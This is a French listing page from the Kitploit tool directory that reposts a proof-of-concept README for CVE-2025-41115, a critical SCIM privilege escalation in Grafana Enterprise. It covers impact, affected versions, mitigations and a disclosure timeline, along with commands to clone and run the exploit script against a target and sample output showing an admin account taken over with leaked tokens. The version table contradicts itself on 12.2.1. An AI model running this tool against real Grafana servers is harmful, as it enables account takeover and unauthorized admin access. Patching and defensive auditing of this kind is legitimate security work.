Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-41115 — CVE-2025-41115 | Kitploit
Outils/GitHubGitHub/rockmelodies/blackash-cve-2025-41115
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité CloudGestion des Identités et des Accès (IAM)Authentification
GitHubrockmelodies/blackash-cve-2025-41115

Blackash-CVE-2025-41115

CVE-2025-41115

Voir le dépôt
116il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔐 CVE-2025-41115: Escalade de privilèges SCIM critique dans Grafana

218fa54275e0e31c37b4e5091d9112ba_M

Vulnérabilité critique d'escalade de privilèges SCIM dans Grafana Enterprise


🌟 Résumé

CVE-2025-41115 est une vulnérabilité Critique (CVSS 10.0) dans Grafana Enterprise affectant sa fonctionnalité d'approvisionnement d'utilisateurs SCIM.

Lorsque l'approvisionnement SCIM est activé et que user_sync_enabled = true, un client SCIM malveillant peut envoyer un externalId numérique, que Grafana mappe par erreur à un identifiant utilisateur interne — permettant à un attaquant de usurper ou écraser des comptes existants, y compris les administrateurs. ⚠️ Grafana OSS n'est PAS affecté.


🚨 Impact

  • 🔓 Prise de contrôle de compte (y compris les comptes administrateurs)
  • 🚀 Escalade de privilèges avec droits d'administrateur complets
  • 🗄️ Accès aux tableaux de bord / données / configurations d'organisation
  • 🌐 Exploitable via le réseau avec des exigences faibles
  • 🛑 Risque élevé pour les configurations SSO multi-tenant ou d'entreprise

Conditions requises pour l'exploitation :

  1. enableSCIM = true
  2. [auth.scim] user_sync_enabled = true

🧩 Versions affectées

VersionStatut
12.0.0 → 12.2.1❌ Vulnérable
12.3.0✅ Corrigé
12.2.1 (patched build)✅ Corrigé
12.1.3✅ Corrigé

💡 Les services Grafana gérés (AWS/Azure/Grafana Cloud) ont été corrigés par les fournisseurs.


Comment l'utiliser en 3 secondes :

1. Téléchargement

root@kitploit:~
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git

ou copiez-collez simplement le script ci-dessus dans un fichier

2. Rendre exécutable (facultatif)

root@kitploit:~
chmod +x CVE-2025-41115.py

3. Exécuter

root@kitploit:~
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com

Quand l'exploit fonctionne (c'est-à-dire que la cible est vulnérable et que le jeton est valide), vous verrez une sortie exactement comme celle-ci : texte

root@kitploit:~
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
  "schemas": [
    "urn:ietf:params:scim:schemas:core:2.0:User"
  ],
  "id": "1",                     ←←← THIS IS THE KEY LINE (UID 1 overwritten)
  "externalId": "1",
  "meta": { ... },
  "userName": "[email protected]",
  "name": {
    "formatted": "Pwned User"
  },
  "emails": [
    {
      "value": "[email protected]",
      "primary": true
    }
  ],
  "active": true
}

🔧 Mesures d'atténuation

🥇 1. Mettez à jour immédiatement

Mettez à jour vers 12.3.0 ou l'une des versions de maintenance corrigées.

🛠️ 2. Vérifiez votre configuration SCIM

Si vous n'utilisez pas l'approvisionnement SCIM, assurez-vous d'avoir :

root@kitploit:~
enableSCIM = false

ou

root@kitploit:~
[auth.scim]
user_sync_enabled = false

📜 3. Journaux d'audit

Recherchez :

  • Nouveaux utilisateurs inattendus
  • Utilisation numérique de externalId
  • Modifications de privilèges

🔐 4. Limites de confiance

Assurez-vous que seuls les fournisseurs d'identité de confiance sont autorisés à communiquer avec votre point de terminaison SCIM.

👀 5. Surveillez les tentatives d'exploitation

Surveillez les connexions suspectes, les événements de création d'utilisateurs ou les prises de contrôle d'administrateurs.


📅 Chronologie

  • 📌 2025-11-04 — Problème découvert en interne
  • 📌 2025-11-04 — Incident déclaré
  • 📌 2025-11-05 — Fournisseurs cloud informés privément et corrigés
  • 📌 2025-11-19 — Divulgation publique et correctif officiel publié

📝 Remarques supplémentaires

  • 🎯 Le défaut est spécifiquement dû au mappage par Grafana de externalId numérique → uid interne.
  • 🟢 L'exploitation nécessite SCIM avec synchronisation d'utilisateurs, donc de nombreux déploiements sont sûrs par défaut — mais vous devez confirmer.
  • ⚡ Aucune exploitation confirmée dans la nature au moment de la divulgation, mais le score CVSS 10 signifie qu'il est extrêmement dangereux.

avertissement!!!

Cette PoC est destinée uniquement aux tests de sécurité autorisés et à un usage éducatif sur les systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite de test. Toute utilisation non autorisée est illégale et peut entraîner des poursuites pénales. L'auteur et le distributeur déclinent toute responsabilité en cas de mauvaise utilisation. Corrigez immédiatement (≥12.0.6 / 12.3.0+).

Télécharger l’outil
12.0.6✅ Corrigé